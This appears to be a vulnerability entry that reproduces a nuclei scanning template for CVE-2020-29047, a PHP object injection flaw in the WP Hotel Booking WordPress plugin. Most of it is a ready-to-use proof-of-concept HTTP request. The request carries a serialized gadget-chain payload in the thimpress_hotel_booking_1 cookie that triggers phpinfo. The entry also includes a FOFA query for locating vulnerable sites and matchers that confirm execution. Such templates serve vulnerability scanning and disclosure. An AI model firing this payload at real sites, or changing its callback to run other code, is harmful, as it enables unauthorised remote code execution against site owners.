漏洞描述
The wp-hotel-booking plugin through 1.10.2 for WordPress allows remote attackers to execute arbitrary code because of an unserialize operation on the thimpress_hotel_booking_1 cookie in load in includes/class-wphb-sessions.php.
CVE-2020-29047: WP Hotel Booking < 1.10.4 - PHP Object Injection
PoC代码[已公开]
id: CVE-2020-29047
info:
name: WP Hotel Booking < 1.10.4 - PHP Object Injection
author: DhiyaneshDk
severity: critical
description: |
The wp-hotel-booking plugin through 1.10.2 for WordPress allows remote attackers to execute arbitrary code because of an unserialize operation on the thimpress_hotel_booking_1 cookie in load in includes/class-wphb-sessions.php.
reference:
- https://wordpress.org/plugins/wp-hotel-booking/#developers
- https://github.com/20142995/nuclei-templates
- https://nvd.nist.gov/vuln/detail/CVE-2020-29047
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2020-29047
cwe-id: CWE-502
epss-score: 0.83879
epss-percentile: 0.99248
cpe: cpe:2.3:a:thimpress:wp_hotel_booking:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 1
vendor: thimpress
product: wp_hotel_booking
framework: wordpress
fofa-query: body="wp-content/plugins/wp-hotel-booking"
tags: cve,cve2020,wordpress,wp-plugin,wp,wp-hotel-booking,rce,thimpress,vkev,vuln
http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
Cookie: thimpress_hotel_booking_1=O:11:"WPHB_Logger":1:{s:21:"%00WPHB_Logger%00_handles"%3BC:33:"Requests_Utility_FilteredIterator":67:{x:i:0%3Ba:1:{i:0%3Bs:2:"-1"%3B}%3Bm:a:1:{s:11:"%00*%00callback"%3Bs:7:"phpinfo"%3B}}}
matchers-condition: and
matchers:
- type: word
part: body
words:
- "PHP Extension"
- "wp-hotel-booking"
condition: and
- type: status
status:
- 200
# digest: 4a0a0047304502206de8da8fd7cc4d343e6510ae9b696a2fef0210f70190bf7d3b5ef146bfa22d4302210098c0a7b8d4cb8f493b6a7da40d976de5db961d6da051d87b64981c50f90caade:922c64590222798bb761d5b6d8e72950